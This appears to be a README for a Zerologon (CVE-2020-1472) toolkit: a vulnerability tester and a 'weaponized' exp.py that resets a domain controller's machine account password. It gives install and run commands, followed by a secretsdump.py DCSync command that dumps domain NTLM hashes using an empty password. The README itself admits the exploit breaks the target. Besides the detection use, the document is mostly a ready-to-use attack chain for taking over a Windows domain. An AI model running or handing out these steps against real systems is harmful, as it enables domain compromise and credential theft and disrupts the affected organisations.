A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472).
I've added a version of the scanner that performs a password reset should the scan be successful, script is "exp.py".
It attempts to perform the Netlogon authentication bypass. The script will immediately terminate when succesfully performing the bypass, and not perform any Netlogon operations. When a domain controller is patched, the detection script will give up after sending 2000 pairs of RPC calls and conclude the target is not vulnerable (with a false negative chance of 0.04%).
Requires Python 3.7 or higher and Pip. Install dependencies as follows:
pip install -r requirements.txt
Note that running pip install impacket should work as well, as long as the script is not broken by future Impacket
versions.
The script targets can be used to target a DC or backup DC. It likely also works against a read-only DC, but this has
not been tested. Given a domain controller named EXAMPLE-DC with IP address 1.2.3.4, run the script as follows:
./zerologon_tester.py EXAMPLE-DC 1.2.3.4
The weaponized script can be run as follows:
./exp.py EXAMPLE-DC 1.2.3.4
If you see a success message, you can perform a DCSync Attack like so:
secretsdump.py -just-dc-ntlm "domain.local/EXAMPLE-DC\[email protected]"
You should be able to just hit "Enter" when prompted for the password!
Tested on Parrot OS against a Windows Server 2012 R2 machine.
NOTE: THIS WILL BREAK THINGS. YOU ARE CHANGING THE MACHINE ACCOUNT PASSWORD TO A DOMAIN CONTROLLER ARBITRARILY.
The DC name should be its NetBIOS computer name. If this name is not correct, the script will likely fail with a
STATUS_INVALID_COMPUTER_NAME error.